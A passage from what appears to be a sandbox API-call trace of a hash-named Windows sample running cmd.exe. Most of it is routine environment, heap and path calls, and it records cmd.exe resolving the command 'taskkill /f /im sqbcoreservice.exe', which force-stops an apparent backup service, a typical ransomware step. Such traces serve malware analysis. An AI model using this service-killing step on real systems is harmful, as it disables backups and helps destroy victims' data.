"c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0202.821] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0202.821] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0202.822] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0202.822] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0202.822] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0202.822] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0202.822] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0202.822] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0202.822] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0202.822] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0202.822] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0202.822] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0202.822] GetProcessHeap () returned 0x640000 [0202.823] RtlFreeHeap (HeapHandle=0x640000, Flags=0x0, BaseAddress=0x648948) returned 1 [0202.823] GetEnvironmentStringsW () returned 0x647f20* [0202.823] GetProcessHeap () returned 0x640000 [0202.823] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0xa32) returned 0x64a7d8 [0202.824] FreeEnvironmentStringsA (penv="A") returned 1 [0202.824] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x1b [0202.824] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0202.824] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0202.824] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0202.824] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0202.824] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0202.824] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0202.824] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0202.824] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0202.824] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0202.824] GetProcessHeap () returned 0x640000 [0202.824] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x44) returned 0x6405c8 [0202.824] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x19fc54 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0202.825] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", nBufferLength=0x104, lpBuffer=0x19fc54, lpFilePart=0x19fc4c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19fc4c*="Desktop") returned 0x1d [0202.825] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0202.825] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x3ce179de, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3ce179de, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x647e98 [0202.825] FindClose (in: hFindFile=0x647e98 | out: hFindFile=0x647e98) returned 1 [0202.826] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ce179de, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x84ac775d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84ac775d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RDhJ0CNFevzX", cAlternateFileName="RDHJ0C~1")) returned 0x647e98 [0202.826] FindClose (in: hFindFile=0x647e98 | out: hFindFile=0x647e98) returned 1 [0202.826] _wcsnicmp (_String1="RDHJ0C~1", _String2="RDhJ0CNFevzX", _MaxCount=0xc) returned 16 [0202.826] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x8d4a6a0d, ftLastAccessTime.dwHighDateTime=0x1d83aa1, ftLastWriteTime.dwLowDateTime=0x8d4a6a0d, ftLastWriteTime.dwHighDateTime=0x1d83aa1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x647e98 [0202.827] FindClose (in: hFindFile=0x647e98 | out: hFindFile=0x647e98) returned 1 [0202.827] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0202.827] SetCurrentDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 1 [0202.827] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 1 [0202.827] GetProcessHeap () returned 0x640000 [0202.827] RtlFreeHeap (HeapHandle=0x640000, Flags=0x0, BaseAddress=0x64a7d8) returned 1 [0202.828] GetEnvironmentStringsW () returned 0x647f20* [0202.828] GetProcessHeap () returned 0x640000 [0202.828] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0xa76) returned 0x649d98 [0202.828] FreeEnvironmentStringsA (penv="=") returned 1 [0202.828] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xf47720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0202.828] GetProcessHeap () returned 0x640000 [0202.828] RtlFreeHeap (HeapHandle=0x640000, Flags=0x0, BaseAddress=0x6405c8) returned 1 [0202.828] GetProcessHeap () returned 0x640000 [0202.828] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x400e) returned 0x64bc98 [0202.829] GetProcessHeap () returned 0x640000 [0202.829] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x58) returned 0x64a818 [0202.829] GetProcessHeap () returned 0x640000 [0202.829] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x4008) returned 0x64fcb0 [0202.830] GetProcessHeap () returned 0x640000 [0202.830] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x4008) returned 0x653cc0 [0202.831] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0202.832] GetProcessHeap () returned 0x640000 [0202.832] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x418) returned 0x64a878 [0202.832] SetErrorMode (uMode=0x0) returned 0x8003 [0202.832] SetErrorMode (uMode=0x1) returned 0x0 [0202.832] GetFullPathNameW (in: lpFileName="taskkill \\f \\.", nBufferLength=0x208, lpBuffer=0x64a880, lpFilePart=0x19fbac | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill \\f", lpFilePart=0x19fbac*="f") returned 0x29 [0202.832] SetErrorMode (uMode=0x8003) returned 0x1 [0202.832] GetProcessHeap () returned 0x640000 [0202.832] RtlReAllocateHeap (Heap=0x640000, Flags=0x0, Ptr=0x64a878, Size=0x8a) returned 0x64a878 [0202.832] GetProcessHeap () returned 0x640000 [0202.833] RtlSizeHeap (HeapHandle=0x640000, Flags=0x0, MemoryPointer=0x64a878) returned 0x8a [0202.833] NeedCurrentDirectoryForExePathW (ExeName="taskkill \\f \\.") returned 1 [0202.833] GetProcessHeap () returned 0x640000 [0202.833] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x62) returned 0x64a910 [0202.833] GetProcessHeap () returned 0x640000 [0202.833] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0xb8) returned 0x64a980 [0202.833] GetProcessHeap () returned 0x640000 [0202.833] RtlReAllocateHeap (Heap=0x640000, Flags=0x0, Ptr=0x64a980, Size=0x62) returned 0x64a980 [0202.833] GetProcessHeap () returned 0x640000 [0202.833] RtlSizeHeap (HeapHandle=0x640000, Flags=0x0, MemoryPointer=0x64a980) returned 0x62 [0202.833] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0202.833] GetProcessHeap () returned 0x640000 [0202.833] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0xe0) returned 0x64a9f0 [0202.839] GetProcessHeap () returned 0x640000 [0202.839] RtlReAllocateHeap (Heap=0x640000, Flags=0x0, Ptr=0x64a9f0, Size=0x76) returned 0x64a9f0 [0202.839] GetProcessHeap () returned 0x640000 [0202.839] RtlSizeHeap (HeapHandle=0x640000, Flags=0x0, MemoryPointer=0x64a9f0) returned 0x76 [0202.839] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0202.839] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill \\f\\im sqbcoreservice.exe ", fInfoLevelId=0x1, lpFindFileData=0x19f958, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f958) returned 0xffffffff [0202.840] GetLastError () returned 0x3 [0202.840] GetProcessHeap () returned 0x640000 [0202.840] RtlFreeHeap (HeapHandle=0x640000, Flags=0x0, BaseAddress=0x64fcb0) returned 1 [0202.841] GetProcessHeap () returned 0x640000 [0202.841] RtlFreeHeap (HeapHandle=0x640000, Flags=0x0, BaseAddress=0x653cc0) returned 1 [0202.842] GetProcessHeap () returned 0x640000 [0202.842] RtlFreeHeap (HeapHandle=0x640000, Flags=0x0, BaseAddress=0x64bc98) returned 1 [0202.842] GetConsoleOutputCP () returned 0x1b5 [0202.847] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0202.848] GetUserDefaultLCID () returned 0x409 [0202.849] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0xf434a0, cchData=8 | out: lpLCData=":") returned 2 [0202.849] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0202.849] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0202.849] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x19fd84, cchData=128 | out: lpLCData="1") returned 2 [0202.849] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0xf434b0, cchData=8 | out: lpLCData="/") returned 2 [0202.849] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0xf43500, cchData=32 | out: lpLCData="Mon") returned 4 [0202.849] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0xf43540, cchData=32 | out: lpLCData="Tue") returned 4 [0202.849] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0xf43580, cchData=32 | out: lpLCData="Wed") returned 4 [0202.849] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0xf435c0, cchData=32 | out: lpLCData="Thu") returned 4 [0202.849] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0xf43600, cchData=32 | out: lpLCData="Fri") returned 4 [0202.850] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0xf43640, cchData=32 | out: lpLCData="Sat") returned 4 [0202.850] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0xf43680, cchData=32 | out: lpLCData="Sun") returned 4 [0202.850] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0xf434c0, cchData=8 | out: lpLCData=".") returned 2 [0202.850] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0xf434e0, cchData=8 | out: lpLCData=",") returned 2 [0202.850] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0202.852] GetProcessHeap () returned 0x640000 [0202.852] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x0, Size=0x20c) returned 0x64aab8 [0202.852] GetConsoleTitleW (in: lpConsoleTitle=0x64aab8, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0202.881] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75600000 [0202.881] GetProcAddress (hModule=0x75600000, lpProcName="CopyFileExW") returned 0x7561ffc0 [0202.881] GetProcAddress (hModule=0x75600000, lpProcName="IsDebuggerPresent") returned 0x7561b0b0 [0202.881] GetProcAddress (hModule=0x75600000, lpProcName="SetConsoleInputExeNameW") returned 0x7559b440 [0202.882] GetProcessHeap () returned 0x640000 [0202.882] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x400a) returned 0x64bc98 [0202.882] GetProcessHeap () returned 0x640000 [0202.883] RtlFreeHeap (HeapHandle=0x640000, Flags=0x0, BaseAddress=0x64bc98) returned 1 [0202.883] _wcsicmp (_String1="taskkill", _String2=")") returned 75 [0202.883] _wcsicmp (_String1="FOR", _String2="taskkill") returned -14 [0202.883] _wcsicmp (_String1="FOR/?", _String2="taskkill") returned -14 [0202.883] _wcsicmp (_String1="IF", _String2="taskkill") returned -11 [0202.883] _wcsicmp (_String1="IF/?", _String2="taskkill") returned -11 [0202.883] _wcsicmp (_String1="REM", _String2="taskkill") returned -2 [0202.884] _wcsicmp (_String1="REM/?", _String2="taskkill") returned -2 [0202.884] GetProcessHeap () returned 0x640000 [0202.884] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x58) returned 0x64acd0 [0202.884] GetProcessHeap () returned 0x640000 [0202.884] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x1a) returned 0x647e98 [0202.884] GetProcessHeap () returned 0x640000 [0202.884] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x40) returned 0x64ad30 [0202.885] GetConsoleTitleW (in: lpConsoleTitle=0x19fa70, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0202.888] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0202.888] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0202.888] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0202.888] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0202.888] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0202.888] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0202.888] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0202.888] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0202.888] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0202.888] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0202.888] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0202.888] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0202.888] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0202.888] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0202.888] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0202.888] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0202.888] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0202.888] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0202.889] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0202.889] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0202.889] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0202.889] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0202.889] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0202.889] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0202.889] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0202.889] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0202.889] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0202.889] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0202.889] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0202.889] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0202.889] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0202.889] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0202.889] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0202.889] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0202.889] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0202.889] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0202.889] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0202.889] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0202.889] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0202.889] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0202.889] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0202.889] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0202.889] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0202.889] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0202.889] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0202.889] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0202.890] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0202.890] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0202.890] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0202.890] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0202.890] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0202.890] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0202.890] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0202.890] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0202.890] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0202.890] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0202.890] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0202.890] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0202.890] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0202.890] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0202.890] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0202.890] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0202.890] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0202.890] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0202.890] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0202.890] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0202.890] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0202.890] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0202.890] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0202.890] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0202.890] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0202.890] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0202.890] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0202.890] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0202.891] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0202.891] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0202.891] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0202.891] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0202.891] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0202.891] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0202.891] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0202.891] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0202.891] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0202.891] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0202.891] _wcsicmp (_String1="taskkill", _String2="FOR") returned 14 [0202.891] _wcsicmp (_String1="taskkill", _String2="IF") returned 11 [0202.891] _wcsicmp (_String1="taskkill", _String2="REM") returned 2 [0202.891] GetProcessHeap () returned 0x640000 [0202.891] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x210) returned 0x64ad78 [0202.891] GetProcessHeap () returned 0x640000 [0202.891] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x52) returned 0x64af90 [0202.892] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0202.892] GetProcessHeap () returned 0x640000 [0202.892] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x418) returned 0x6405c8 [0202.892] SetErrorMode (uMode=0x0) returned 0x8003 [0202.892] SetErrorMode (uMode=0x1) returned 0x0 [0202.892] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x6405d0, lpFilePart=0x19f57c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19f57c*="Desktop") returned 0x1d [0202.892] SetErrorMode (uMode=0x8003) returned 0x1 [0202.892] GetProcessHeap () returned 0x640000 [0202.892] RtlReAllocateHeap (Heap=0x640000, Flags=0x0, Ptr=0x6405c8, Size=0x56) returned 0x6405c8 [0202.892] GetProcessHeap () returned 0x640000 [0202.892] RtlSizeHeap (HeapHandle=0x640000, Flags=0x0, MemoryPointer=0x6405c8) returned 0x56 [0202.892] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0202.892] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0202.892] GetProcessHeap () returned 0x640000 [0202.892] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x110) returned 0x64aff0 [0202.893] GetProcessHeap () returned 0x640000 [0202.893] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x218) returned 0x640628 [0202.898] GetProcessHeap () returned 0x640000 [0202.898] RtlReAllocateHeap (Heap=0x640000, Flags=0x0, Ptr=0x640628, Size=0x112) returned 0x640628 [0202.898] GetProcessHeap () returned 0x640000 [0202.898] RtlSizeHeap (HeapHandle=0x640000, Flags=0x0, MemoryPointer=0x640628) returned 0x112 [0202.898] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0202.898] GetProcessHeap () returned 0x640000 [0202.898] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0xe0) returned 0x64b108 [0202.900] GetProcessHeap () returned 0x640000 [0202.900] RtlReAllocateHeap (Heap=0x640000, Flags=0x0, Ptr=0x64b108, Size=0x76) returned 0x64b108 [0202.900] GetProcessHeap () returned 0x640000 [0202.900] RtlSizeHeap (HeapHandle=0x640000, Flags=0x0, MemoryPointer=0x64b108) returned 0x76 [0202.900] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0202.900] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0xffffffff [0202.901] GetLastError () returned 0x2 [0202.901] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0202.901] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0x64b188 [0202.901] GetProcessHeap () returned 0x640000 [0202.901] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x0, Size=0x14) returned 0x647858 [0202.901] FindClose (in: hFindFile=0x64b188 | out: hFindFile=0x64b188) returned 1 [0202.901] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.COM", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0xffffffff [0202.901] GetLastError () returned 0x2 [0202.902] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.EXE", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0x64b188 [0202.902] GetProcessHeap () returned 0x640000 [0202.902] RtlReAllocateHeap (Heap=0x640000, Flags=0x0, Ptr=0x647858, Size=0x4) returned 0x647ec0 [0202.902] FindClose (in: hFindFile=0x64b188 | out: hFindFile=0x64b188) returned 1 [0202.902] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0202.902] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0202.902] GetConsoleTitleW (in: lpConsoleTitle=0x19f7fc, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0202.904] InitializeProcThreadAttributeList (in: lpAttributeList=0x19f728, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x19f70c | out: lpAttributeList=0x19f728, lpSize=0x19f70c) returned 1 [0202.904] UpdateProcThreadAttribute (in: lpAttributeList=0x19f728, dwFlags=0x0, Attribute=0x60001, lpValue=0x19f714, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x19f728, lpPreviousValue=0x0) returned 1 [0202.905] GetStartupInfoW (in: lpStartupInfo=0x19f760 | out: lpStartupInfo=0x19f760*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x158, hStdOutput=0x130, hStdError=0x13c)) [0202.905] GetProcessHeap () returned 0x640000 [0202.905] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x18) returned 0x6478d8 [0202.905] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0202.905] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0202.905] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0202.905] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0202.905] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0202.905] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0202.905] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0202.905] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0202.905] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0202.905] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0202.905] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0202.905] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0202.905] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0202.905] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0202.905] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0202.905] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0202.905] 